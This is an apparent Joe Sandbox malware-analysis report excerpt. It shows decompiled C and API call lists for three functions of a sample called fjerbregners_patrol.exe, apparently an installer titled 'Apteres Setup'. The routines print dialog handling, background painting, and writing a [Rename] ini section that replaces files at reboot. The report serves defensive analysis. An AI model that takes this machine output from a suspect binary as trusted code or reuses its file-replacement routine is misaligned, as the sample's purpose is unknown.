                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                                                                                                                                                                            • Instruction ID: fe01047cc33e4024c31aa5db45adbddf6795905ef87c41118e37a50bf1306022
                                                                                                                                                                                            • Opcode Fuzzy Hash: fcf2038373dac2d3d8319ce80b5227dedc9fd9d207136d333b3d89b18dbcf931
                                                                                                                                                                                            • Instruction Fuzzy Hash: DDC15AB1A0C3918FD364CF29C48076ABBE1FBC6340F10892EE5DA9B391D6789546CB47
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00403CBC Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 217windowstringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                            			E00403CBC() {
				struct HWND__* _t58;
				intOrPtr _t59;
				intOrPtr _t64;
				char* _t86;
				struct HWND__* _t87;
				long _t100;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t116;
				signed int _t117;
				intOrPtr _t119;
				struct HWND__* _t121;
				int _t122;
				int _t128;
				intOrPtr _t131;
				struct HWND__* _t132;
				struct HWND__* _t133;
				int _t134;
				void* _t137;

				if( *((intOrPtr*)(_t137 + 0x50)) != 0x110) {
					_t134 =  *(_t137 + 0x68);
					if( *(_t137 + 0x60) != 0x111) {
						if( *(_t137 + 0x60) != 0x4e) {
							if( *(_t137 + 0x60) == 0x40b) {
								 *0x4205f4 =  *0x4205f4 + 1;
							}
							L25:
							return E004055E0( *(_t137 + 0x68),  *(_t137 + 0x68), _t134);
						}
						_t58 = GetDlgItem( *(_t137 + 0x60), 0x3e8);
						_t113 =  *((intOrPtr*)(_t134 + 8));
						_t121 = _t58;
						if(_t113 != 0x70b) {
							L16:
							if(_t113 != 0x700 ||  *((intOrPtr*)(_t134 + 0xc)) != 0x100) {
								goto L25;
							} else {
								_t59 =  *((intOrPtr*)(_t134 + 0x10));
								if(_t59 == 0xd) {
									SendMessageA( *0x4237f8, 0x111, "true", 0);
									_t59 =  *((intOrPtr*)(_t134 + 0x10));
								}
								if(_t59 == 0x1b) {
									SendMessageA( *0x4237f8, 0x10, 0, 0);
								}
								return 1;
							}
						}
						if( *((intOrPtr*)(_t134 + 0xc)) != 0x201) {
							goto L25;
						}
						_t64 =  *((intOrPtr*)(_t134 + 0x1c));
						_t114 =  *((intOrPtr*)(_t134 + 0x18));
						 *((intOrPtr*)(_t137 + 0x14)) = _t64;
						 *(_t137 + 0x10) = _t114;
						 *(_t137 + 0x18) = 0x422fa0;
						if(_t64 - _t114 >= 0x800) {
							goto L25;
						}
						SendMessageA(_t121, 0x44b, 0, _t137 + 0x10);
						SetCursor(LoadCursorA(0, 0x7f02));
						 *((intOrPtr*)(_t137 + 0x24)) =  *((intOrPtr*)(_t137 + 0x5c));
						 *(_t137 + 0x2c) =  *(_t137 + 0x18);
						 *((intOrPtr*)(_t137 + 0x24)) = 0x500;
						 *((intOrPtr*)(_t137 + 0x3c)) = 1;
						 *(_t137 + 0x2c) = "open";
						 *((intOrPtr*)(_t137 + 0x34)) = 0;
						 *((intOrPtr*)(_t137 + 0x38)) = 0;
						E004067EE(_t137 + 0x1c);
						SetCursor(LoadCursorA(0, 0x7f00));
						_t113 =  *((intOrPtr*)(_t134 + 8));
						goto L16;
					}
					if( *(_t137 + 0x64) >> 0x10 == 0 &&  *0x4205f4 == 0) {
						_t131 =  *0x4205e4; // 0x54e0cc
						if(( *(_t131 + 0x14) & 0x00000020) != 0) {
							_t116 = SendMessageA(GetDlgItem( *(_t137 + 0x6c), 0x40a), 0xf0, 0, 0) & 0x00000001;
							 *(_t131 + 0x14) =  *(_t131 + 0x14) & 0xfffffffe | _t116;
							EnableWindow( *0x4205ec, _t116);
							E0040542B();
						}
					}
					goto L25;
				} else {
					_t122 =  *(_t137 + 0x68);
					_t117 =  *(_t122 + 0x30);
					if(_t117 < 0) {
						_t119 =  *0x4237e0; // 0x5527aa
						_t117 =  *(_t119 - 4 + _t117 * 4);
					}
					_t86 =  *0x424038 + _t117;
					_push( *((intOrPtr*)(_t122 + 0x34)));
					_t132 =  *(_t137 + 0x60);
					_t87 = _t86 + 1;
					_push(0x22);
					 *((intOrPtr*)(_t137 + 0x70)) =  *_t86;
					_t128 = ( !( *(_t122 + 0x14) >> 5) |  *(_t122 + 0x14)) & 1;
					 *(_t137 + 0x6c) = _t87;
					 *(_t137 + 0x1c) = _t87;
					 *((intOrPtr*)(_t137 + 0x20)) = 0;
					 *((intOrPtr*)(_t137 + 0x24)) = E0040552D;
					E00405409(_t132);
					_push( *((intOrPtr*)( *(_t137 + 0x68) + 0x38)));
					_push(0x23);
					E00405409(_t132);
					CheckDlgButton(_t132, (_t128 ^ 1) + 0x40a, 1);
					EnableWindow( *0x4205ec, _t128);
					_t133 = GetDlgItem(_t132, 0x3e8);
					E004053F2(_t133);
					SendMessageA(_t133, 0x45b, 1, 0);
					_t100 =  *( *0x424010 + 0x68);
					if(_t100 < 0) {
						_t100 = GetSysColor( ~_t100);
					}
					SendMessageA(_t133, 0x443, 0, _t100);
					SendMessageA(_t133, 0x445, 0, 0x4010000);
					SendMessageA(_t133, 0x435, 0, lstrlenA( *(_t137 + 0x60)));
					 *0x4205f4 = 0;
					SendMessageA(_t133, 0x449,  *(_t137 + 0x68), _t137 + 0x10);
					 *0x4205f4 = 0;
					return 0;
				}
			}






















                                                                                                                                                                                            0x00403ccb
                                                                                                                                                                                            0x00403def
                                                                                                                                                                                            0x00403df3
                                                                                                                                                                                            0x00403e6d
                                                                                                                                                                                            0x00403f88
                                                                                                                                                                                            0x00403f8a
                                                                                                                                                                                            0x00403f8a
                                                                                                                                                                                            0x00403f90
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403f99
                                                                                                                                                                                            0x00403e7c
                                                                                                                                                                                            0x00403e82
                                                                                                                                                                                            0x00403e87
                                                                                                                                                                                            0x00403e8f
                                                                                                                                                                                            0x00403f36
                                                                                                                                                                                            0x00403f3c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403f47
                                                                                                                                                                                            0x00403f47
                                                                                                                                                                                            0x00403f4d
                                                                                                                                                                                            0x00403f5d
                                                                                                                                                                                            0x00403f63
                                                                                                                                                                                            0x00403f63
                                                                                                                                                                                            0x00403f69
                                                                                                                                                                                            0x00403f75
                                                                                                                                                                                            0x00403f75
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403f7d
                                                                                                                                                                                            0x00403f3c
                                                                                                                                                                                            0x00403e9c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403ea2
                                                                                                                                                                                            0x00403ea5
                                                                                                                                                                                            0x00403ea8
                                                                                                                                                                                            0x00403eae
                                                                                                                                                                                            0x00403eb2
                                                                                                                                                                                            0x00403ebf
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403ed1
                                                                                                                                                                                            0x00403eec
                                                                                                                                                                                            0x00403ef2
                                                                                                                                                                                            0x00403efa
                                                                                                                                                                                            0x00403f03
                                                                                                                                                                                            0x00403f0b
                                                                                                                                                                                            0x00403f13
                                                                                                                                                                                            0x00403f1b
                                                                                                                                                                                            0x00403f1f
                                                                                                                                                                                            0x00403f23
                                                                                                                                                                                            0x00403f31
                                                                                                                                                                                            0x00403f33
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403f33
                                                                                                                                                                                            0x00403dff
                                                                                                                                                                                            0x00403e12
                                                                                                                                                                                            0x00403e1c
                                                                                                                                                                                            0x00403e46
                                                                                                                                                                                            0x00403e55
                                                                                                                                                                                            0x00403e58
                                                                                                                                                                                            0x00403e5e
                                                                                                                                                                                            0x00403e5e
                                                                                                                                                                                            0x00403e1c
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403cd1
                                                                                                                                                                                            0x00403cd1
                                                                                                                                                                                            0x00403cd5
                                                                                                                                                                                            0x00403cda
                                                                                                                                                                                            0x00403ce3
                                                                                                                                                                                            0x00403ceb
                                                                                                                                                                                            0x00403ceb
                                                                                                                                                                                            0x00403cf7
                                                                                                                                                                                            0x00403cf9
                                                                                                                                                                                            0x00403cfc
                                                                                                                                                                                            0x00403d0e
                                                                                                                                                                                            0x00403d0f
                                                                                                                                                                                            0x00403d12
                                                                                                                                                                                            0x00403d16
                                                                                                                                                                                            0x00403d18
                                                                                                                                                                                            0x00403d1c
                                                                                                                                                                                            0x00403d20
                                                                                                                                                                                            0x00403d24
                                                                                                                                                                                            0x00403d2c
                                                                                                                                                                                            0x00403d35
                                                                                                                                                                                            0x00403d38
                                                                                                                                                                                            0x00403d3b
                                                                                                                                                                                            0x00403d4c
                                                                                                                                                                                            0x00403d59
                                                                                                                                                                                            0x00403d6b
                                                                                                                                                                                            0x00403d6e
                                                                                                                                                                                            0x00403d81
                                                                                                                                                                                            0x00403d88
                                                                                                                                                                                            0x00403d8d
                                                                                                                                                                                            0x00403d92
                                                                                                                                                                                            0x00403d92
                                                                                                                                                                                            0x00403da0
                                                                                                                                                                                            0x00403dae
                                                                                                                                                                                            0x00403dc1
                                                                                                                                                                                            0x00403dc7
                                                                                                                                                                                            0x00403dd8
                                                                                                                                                                                            0x00403dda
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00403de0

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CheckDlgButton.USER32(?,?,00000001), ref: 00403D4C
                                                                                                                                                                                            • EnableWindow.USER32(?), ref: 00403D59
                                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00403D65
                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403D81
                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00403D92
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403DA0
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403DAE
                                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 00403DB4
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                            • SendMessageA.USER32(00000000,00000449,?,?), ref: 00403DD8
                                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 00403E34
                                                                                                                                                                                            • SendMessageA.USER32(00000000), ref: 00403E3B
                                                                                                                                                                                            • EnableWindow.USER32(00000000), ref: 00403E58
                                                                                                                                                                                            • GetDlgItem.USER32(0000004E,000003E8), ref: 00403E7C
                                                                                                                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 00403ED1
                                                                                                                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 00403EE3
                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00403EEC
                                                                                                                                                                                              • Part of subcall function 004067EE: ShellExecuteExA.SHELL32(?,004020A0,?), ref: 004067FD
                                                                                                                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00403F2E
                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00403F31
                                                                                                                                                                                            • SendMessageA.USER32(00000111,?,00000000), ref: 00403F5D
                                                                                                                                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 00403F75
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$EnableLoadWindow$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                                                                            • String ID: Call$N
                                                                                                                                                                                            • API String ID: 3270077613-3438112850
                                                                                                                                                                                            • Opcode ID: 9aad7e0488a8ff479dbf32a480d43350407d5a243b1ebcce80e97b56e403ee52
                                                                                                                                                                                            • Instruction ID: 95250b15e539317fec1db9ab55aeace37dc230fb444a8a1e4beaa01b2d65f9da
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aad7e0488a8ff479dbf32a480d43350407d5a243b1ebcce80e97b56e403ee52
                                                                                                                                                                                            • Instruction Fuzzy Hash: DB7190B1604705AFD7109F25DD48A6B7BE9FF88349F40083EF681A62A1CB78D941CF5A
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 128COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                            			E00401000() {
				struct HDC__* _t64;
				void* _t82;
				void* _t92;
				intOrPtr _t98;
				struct HDC__* _t100;
				struct tagRECT _t102;
				long _t110;
				struct HWND__* _t120;
				void* _t126;
				void* _t128;
				intOrPtr _t131;
				void* _t133;

				if( *((intOrPtr*)(_t133 + 0x64)) == 0xf) {
					_t131 =  *0x424010;
					_t64 = BeginPaint( *(_t133 + 0x74), _t133 + 0x24);
					 *(_t133 + 0x10) =  *(_t133 + 0x10) & 0x00000000;
					_t100 = _t64;
					GetClientRect( *(_t133 + 0x74), _t133 + 0x1c);
					_t120 =  *(_t133 + 0x28);
					 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0x00000000;
					_t102 =  *(_t133 + 0x20);
					 *(_t133 + 0x74) = _t120;
					while(_t102 < _t120) {
						_t116 = _t120 - _t102;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						 *(_t133 + 0x18) = (((( *(_t131 + 0x56) & 0x000000ff) * _t102 + ( *(_t131 + 0x52) & 0x000000ff) * (_t120 - _t102)) / _t120 & 0x000000ff) << 0x00000008 | (( *(_t131 + 0x55) & 0x000000ff) *  *(_t133 + 0x20) + ( *(_t131 + 0x51) & 0x000000ff) * _t116) /  *(_t133 + 0x74) & 0x000000ff) << 0x00000008 | (( *(_t131 + 0x54) & 0x000000ff) *  *(_t133 + 0x20) + ( *(_t131 + 0x50) & 0x000000ff) * _t116) /  *(_t133 + 0x74) & 0x000000ff;
						_t82 = CreateBrushIndirect(_t133 + 0x10);
						 *(_t133 + 0x28) =  *(_t133 + 0x28) + 4;
						_t126 = _t82;
						FillRect(_t100, _t133 + 0x20, _t126);
						DeleteObject(_t126);
						_t120 =  *(_t133 + 0x74);
						_t102 =  *(_t133 + 0x20) + 4;
						 *(_t133 + 0x20) = _t102;
					}
					if( *(_t131 + 0x58) != 0xffffffff) {
						_t128 = CreateFontIndirectA( *(_t131 + 0x34));
						 *(_t133 + 0x74) = _t128;
						if(_t128 != 0) {
							 *(_t133 + 0x24) = 0x10;
							 *(_t133 + 0x28) = 8;
							SetBkMode(_t100, "true");
							SetTextColor(_t100,  *(_t131 + 0x58));
							_t92 = SelectObject(_t100, _t128);
							DrawTextA(_t100, "Apteres Setup", 0xffffffff, _t133 + 0x20, 0x820);
							SelectObject(_t100, _t92);
							DeleteObject( *(_t133 + 0x74));
						}
					}
					EndPaint( *(_t133 + 0x74), _t133 + 0x2c);
					return 0;
				}
				_t110 =  *(_t133 + 0x6c);
				if( *((intOrPtr*)(_t133 + 0x64)) == 0x46) {
					 *(_t110 + 0x18) =  *(_t110 + 0x18) | 0x00000010;
					_t98 =  *0x4237f8; // 0x303de
					 *((intOrPtr*)(_t110 + 4)) = _t98;
				}
				return DefWindowProcA( *(_t133 + 0x6c),  *(_t133 + 0x6c),  *(_t133 + 0x6c), _t110);
			}















                                                                                                                                                                                            0x00401008
                                                                                                                                                                                            0x0040103b
                                                                                                                                                                                            0x0040104c
                                                                                                                                                                                            0x00401052
                                                                                                                                                                                            0x00401057
                                                                                                                                                                                            0x00401062
                                                                                                                                                                                            0x00401068
                                                                                                                                                                                            0x0040106c
                                                                                                                                                                                            0x00401071
                                                                                                                                                                                            0x00401075
                                                                                                                                                                                            0x0040110f
                                                                                                                                                                                            0x00401087
                                                                                                                                                                                            0x00401096
                                                                                                                                                                                            0x004010b1
                                                                                                                                                                                            0x004010cc
                                                                                                                                                                                            0x004010db
                                                                                                                                                                                            0x004010df
                                                                                                                                                                                            0x004010e5
                                                                                                                                                                                            0x004010ea
                                                                                                                                                                                            0x004010f3
                                                                                                                                                                                            0x004010fa
                                                                                                                                                                                            0x00401104
                                                                                                                                                                                            0x00401108
                                                                                                                                                                                            0x0040110b
                                                                                                                                                                                            0x0040110b
                                                                                                                                                                                            0x0040111b
                                                                                                                                                                                            0x00401126
                                                                                                                                                                                            0x00401128
                                                                                                                                                                                            0x0040112e
                                                                                                                                                                                            0x00401133
                                                                                                                                                                                            0x0040113b
                                                                                                                                                                                            0x00401143
                                                                                                                                                                                            0x0040114d
                                                                                                                                                                                            0x0040115b
                                                                                                                                                                                            0x00401171
                                                                                                                                                                                            0x00401179
                                                                                                                                                                                            0x0040117f
                                                                                                                                                                                            0x0040117f
                                                                                                                                                                                            0x0040112e
                                                                                                                                                                                            0x0040118e
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00401199
                                                                                                                                                                                            0x0040100f
                                                                                                                                                                                            0x00401013
                                                                                                                                                                                            0x00401015
                                                                                                                                                                                            0x00401019
                                                                                                                                                                                            0x0040101e
                                                                                                                                                                                            0x0040101e
                                                                                                                                                                                            0x00000000

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • DefWindowProcA.USER32(?,?,?,?), ref: 0040102E
                                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 0040104C
                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00401062
                                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010DF
                                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010F3
                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004010FA
                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401120
                                                                                                                                                                                            • SetBkMode.GDI32(00000000,?), ref: 00401143
                                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 0040114D
                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0040115B
                                                                                                                                                                                            • DrawTextA.USER32(00000000,Apteres Setup,000000FF,?,00000820), ref: 00401171
                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401179
                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 0040117F
                                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040118E
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                            • String ID: Apteres Setup$F
                                                                                                                                                                                            • API String ID: 941294808-97104460
                                                                                                                                                                                            • Opcode ID: 65edd35c989c2391d29ed269cf0e1a7ae3ad241e17de7f7b19be870f33220498
                                                                                                                                                                                            • Instruction ID: 0db2f24145fa73638950136cbdba82e1af8284e9f0dc7614545bc7e8cc89fd94
                                                                                                                                                                                            • Opcode Fuzzy Hash: 65edd35c989c2391d29ed269cf0e1a7ae3ad241e17de7f7b19be870f33220498
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4441B0B20083549FC7159F65CE4896BBBE9FF88715F150A2EF9D1A62A0C738C904CFA5
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00406178 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 123memorystringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                            			E00406178() {
				long _t10;
				void* _t32;
				void* _t36;
				long _t37;
				intOrPtr* _t39;
				void* _t43;
				CHAR* _t44;
				long _t46;
				int _t48;
				void* _t49;

				_t44 =  *(_t49 + 0x14);
				 *0x422658 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t10 = GetShortPathNameA( *(_t49 + 0x1c), 0x422258, 0x400);
					if(_t10 != 0 && _t10 <= 0x400) {
						_t48 = wsprintfA(0x421e58, "%s=%s\r\n", 0x422658, 0x422258);
						_push( *((intOrPtr*)( *0x424010 + 0x128)));
						_push(0x422258);
						E00405D47();
						_t10 = E0040671A(0x422258, 0xc0000000, 4);
						_t32 = _t10;
						if(_t32 != 0xffffffff) {
							_t46 = GetFileSize(_t32, 0);
							_t4 = _t48 + 0xa; // 0xa
							_t35 = _t4 + _t46;
							_t43 = GlobalAlloc(0x40, _t4 + _t46);
							if(_t43 != 0 && E00406747(_t35, _t32, _t43, _t46) != 0) {
								if(E00406926(_t43, "[Rename]\r\n") != 0) {
									_t36 = E00406926(_t16 + 0xa, "\n[");
									if(_t36 == 0) {
										goto L10;
									} else {
										_t39 = _t43 + _t46;
										while(_t39 > _t36) {
											 *((char*)(_t39 + _t48)) =  *_t39;
											_t39 = _t39 - 1;
										}
										_t37 = _t36 - _t43 + 1;
										goto L11;
									}
									goto L13;
								} else {
									lstrcpyA(_t43 + _t46, "[Rename]\r\n");
									_t46 = _t46 + 0xa;
									L10:
									_t37 = _t46;
								}
								L11:
								E00406498(_t37 + _t43, 0x421e58, _t48);
								SetFilePointer(_t32, 0, 0, 0);
								E00406806(_t37, _t32, _t43, _t46 + _t48);
								GlobalFree(_t43);
							}
							_t10 = CloseHandle(_t32);
						}
					}
				} else {
					CloseHandle(E0040671A(_t44, 0, "true"));
					_t10 = GetShortPathNameA(_t44, 0x422658, 0x400);
					if(_t10 != 0 && _t10 <= 0x400) {
						goto L3;
					}
				}
				L13:
				return _t10;
			}













                                                                                                                                                                                            0x0040617b
                                                                                                                                                                                            0x00406184
                                                                                                                                                                                            0x0040619c
                                                                                                                                                                                            0x004061c4
                                                                                                                                                                                            0x004061cf
                                                                                                                                                                                            0x004061d3
                                                                                                                                                                                            0x004061fc
                                                                                                                                                                                            0x004061fe
                                                                                                                                                                                            0x00406204
                                                                                                                                                                                            0x00406205
                                                                                                                                                                                            0x00406212
                                                                                                                                                                                            0x00406217
                                                                                                                                                                                            0x0040621c
                                                                                                                                                                                            0x0040622b
                                                                                                                                                                                            0x0040622d
                                                                                                                                                                                            0x00406230
                                                                                                                                                                                            0x0040623b
                                                                                                                                                                                            0x0040623f
                                                                                                                                                                                            0x0040625a
                                                                                                                                                                                            0x004062b7
                                                                                                                                                                                            0x004062bb
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004062bd
                                                                                                                                                                                            0x004062bd
                                                                                                                                                                                            0x004062c8
                                                                                                                                                                                            0x004062c4
                                                                                                                                                                                            0x004062c7
                                                                                                                                                                                            0x004062c7
                                                                                                                                                                                            0x004062ce
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004062ce
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x0040625c
                                                                                                                                                                                            0x00406265
                                                                                                                                                                                            0x0040626b
                                                                                                                                                                                            0x0040626e
                                                                                                                                                                                            0x0040626e
                                                                                                                                                                                            0x0040626e
                                                                                                                                                                                            0x00406270
                                                                                                                                                                                            0x0040627a
                                                                                                                                                                                            0x00406285
                                                                                                                                                                                            0x00406291
                                                                                                                                                                                            0x00406297
                                                                                                                                                                                            0x00406297
                                                                                                                                                                                            0x0040629e
                                                                                                                                                                                            0x0040629e
                                                                                                                                                                                            0x0040621c
                                                                                                                                                                                            0x0040619e
                                                                                                                                                                                            0x004061a9
                                                                                                                                                                                            0x004061b2
                                                                                                                                                                                            0x004061b6
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x00000000
                                                                                                                                                                                            0x004061b6
                                                                                                                                                                                            0x004062a4
                                                                                                                                                                                            0x004062a8

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,756C8A60,?,00406106,?,?), ref: 004061A9
                                                                                                                                                                                            • GetShortPathNameA.KERNEL32(?,00422658,00000400), ref: 004061B2
                                                                                                                                                                                            • GetShortPathNameA.KERNEL32(?,00422258,00000400), ref: 004061CF
                                                                                                                                                                                            • wsprintfA.USER32 ref: 004061ED
                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00422258,C0000000,00000004,00422258,?), ref: 00406225
                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406235
                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00406265
                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00421E58,00000000,-0000000A,0040871C,00000000,[Rename],00000000,00000000,00000000), ref: 00406285
                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406297
                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040629E
                                                                                                                                                                                              • Part of subcall function 0040671A: GetFileAttributesA.KERNELBASE(00000003,004032DC,C:\Users\user\Desktop\fjerbregners_patrol.exe,80000000,00000003), ref: 0040671E
                                                                                                                                                                                              • Part of subcall function 0040671A: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000000,00000000), ref: 0040673E
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.3669542972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.3669517465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669601681.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669632983.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.3669858027.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                            • String ID: %s=%s$X"B$X&B$[Rename]
                                                                                                                                                                                            • API String ID: 2900126502-3037367084
                                                                                                                                                                                            • Opcode ID: a9128453349c8f2434c1cf46ed29d2249ee925f25d7b1e92cf996b71b476f12a
                                                                                                                                                                                            • Instruction ID: 03c1d20dcbd6be14cd7028ed1d5ca9c1ba50f7237153a65837239fed547388e3
